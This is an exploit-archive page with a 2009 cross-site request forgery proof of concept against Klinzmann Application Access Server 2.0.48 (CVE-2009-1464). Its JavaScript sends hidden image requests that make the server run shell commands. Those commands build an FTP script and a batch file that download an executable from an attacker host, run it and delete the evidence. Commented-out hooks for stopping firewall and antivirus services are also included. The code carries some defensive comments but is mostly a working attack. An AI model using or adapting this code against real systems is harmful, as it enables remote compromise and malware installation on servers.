
Klinzmann A-A-S 2.0.48 XSRF Exploit

Klinzmann A-A-S 2.0.48 XSRF Exploit
Posted May 13, 2009
Authored by Felipe Daragon | Site syhunt.com

Klinzmann Application Access Server version 2.0.48 cross-site request forgery exploit.

tags | exploit, csrf
advisories | CVE-2009-1464
SHA-256 | 8fbdf9086123ab178a93c6aa387ee37b227bad398eb09b10822fe24d631ab585

Klinzmann A-A-S 2.0.48 XSRF Exploit

<html>
<body>

<!--
****************************************************************
AASHack 1.0 (By Felipe M. Aragon)
Affected Versions: AAS 2.0.48 and possibly older versions

This is an exploit demonstration code for the A-A-S (Application
Access Server) index.aas job parameter XSRF vulnerability
(CVE-2009-1464)

This script has been successfully tested on IE 7.0 and Firefox
3.08. It should work on any browser that has JavaScript enabled.

Vulnerability found by Syhunt (http://www.syhunt.com)

This script should be used only by system administrators (or
other people in charge). Read the text below before making any
use of this script.

(c) 2009 Syhunt Cyber Security Company. All rights reserved.

This script is provided 'as-is', without any expressed or implied
warranty. In no event will the author be held liable for
any damages arising from the use of this script.
Permission is granted to anyone to use this script, and to alter
it and redistribute it freely, subject to the following
restrictions:

1. The origin of this script must not be misrepresented, you
must not claim that you wrote the original code.
2. Altered source versions must be plainly marked as such, and
must not be misrepresented as being the original script.
3. This notice may not be removed or altered from any source
distribution.

If you have any questions concerning this license, please email
contact _at_ syhunt _dot_ com
****************************************************************
-->

<script>
// Javascript is used to force the browser to sequentially load
// the images that will trigger the server commands.

// Attacker-side configuration. Every value here is a placeholder in the
// published PoC ([host], x.x.x.x). aas_url is the base of every request
// this page issues; 6262 is simply the port the PoC's default URL uses.
// dd is the busy-wait (see delay()) inserted after each request so the
// server processes them in order.
var dd=1000; // default delay time (ms)
var aas_url='http://[host]:6262'; // target AAS host
var ftp_host='x.x.x.x'; // attacker ftp host
var ftp_user='anonymous';
var ftp_pass='123456';
var ftp_commands_file='aashack.ftp';
var batch_file='aashack.bat';
var attacker_file='file.exe'; // file to upload

// Synchronous busy-wait: spins until `ms` milliseconds of wall-clock time
// have passed. It blocks the page's single thread on purpose, so the
// document.write() calls made between delays are spaced out in time
// rather than merely queued.
function delay(ms) {
  var deadline = new Date().getTime() + ms;
  while (new Date().getTime() < deadline) {
    // spin
  }
}

// Emits one hidden <img> whose src is a GET request to the AAS index.aas
// handler. The browser fetches it automatically, so the request carries
// whatever authorization the victim's browser already holds for aas_url
// (presumably an authenticated admin session — the PoC does not show it).
// No anti-CSRF token is attached because, per CVE-2009-1464, the server
// does not demand one.
//   job    - AAS job name: 'command', 'setservice' or 'killprocess' below
//   action - job-specific argument, URL-encoded with escape()
//   select - secondary argument (service or process name), URL-encoded
// Root cause from a defender's view: state-changing jobs reachable via a
// plain GET with no per-request token. The fix belongs on the server
// (token or origin check); nothing the client does changes that.
function writeimg(job,action,select) {
var act = escape(action);
var sel = escape(select);
document.write('<img src="'+aas_url+'/index.aas?job='+job+'&action='+act+'&select='+sel+'" style="visibility:hidden;">');
}

// Main Functions
// Issues one 'command' job and then blocks for dms ms before the next one.
function Run(action,dms) { writeimg('command',action,''); delay(dms); }
// Wraps cmdline in 'cmd /C' so the server's 'command' job runs it through
// the Windows shell; dms is passed straight to Run().
function Console(cmdline,dms) { Run('cmd /C '+cmdline,dms); }
// Appends one line to the ftp script file via 'echo ... >>'. Each call is
// a separate request, which is why the whole sequence takes several seconds.
function AddFTPCmd(cmdline) { Console('echo '+cmdline+'>>'+ftp_commands_file,dd); }
// Same 'echo ... >>' trick as AddFTPCmd, but appends to the batch file.
function AddBatchLine(line) { Console('echo '+line+'>>'+batch_file,dd); }
//function Kill(exename) { Run('taskkill /f /im '+exename,dd); } // alternative way to kill a process
// 'setservice' job with action 'stop'; select names the service. Unused in
// the default flow (StopUndesiredServices() is empty).
function StopSvc(servicename) { writeimg('setservice','stop',servicename); delay(dd); }
// 'killprocess' job; select names the process image. Unused in the default
// flow (KillUndesiredProcesses() is empty).
function KillProcess(exename) { writeimg('killprocess','',exename); delay(dd); }

// Hook for stopping services before the batch file runs. Every call is
// commented out, so as published this function is a no-op.
function StopUndesiredServices() {
//StopSvc("somefirewall");
//StopSvc("someantivirus");
//StopSvc("wuauserv"); // Automatic Updates
}

// Hook for killing processes before the batch file runs. The only call is
// commented out, so as published this function is a no-op.
function KillUndesiredProcesses() {
//KillProcess('firewall.exe');
}

// Main flow, executed as the page loads. It writes the ftp script one line
// per request, then the batch file one line per request, then runs the
// batch file. With the two hook functions empty that is 12 'command'
// requests, each followed by a dd (1000 ms) busy-wait, so the page blocks
// for roughly 12 s while it runs.
// Detection note: on the AAS side this shows up as a burst of
// index.aas?job=command requests whose action begins with 'cmd /C echo'
// and contains '>>', arriving about one second apart from a browser.
AddFTPCmd(ftp_user);
AddFTPCmd(ftp_pass);
AddFTPCmd('binary');
AddFTPCmd('get '+attacker_file);
AddFTPCmd('close');
AddFTPCmd('bye');
AddBatchLine('@echo off');
AddBatchLine('ftp -is:'+ftp_commands_file+' '+ftp_host);
AddBatchLine('start '+attacker_file);
AddBatchLine('del '+ftp_commands_file);
AddBatchLine('del %0'); // self-destruct
StopUndesiredServices();
KillUndesiredProcesses();
Run(batch_file,dd);
</script>

</body>
</html>

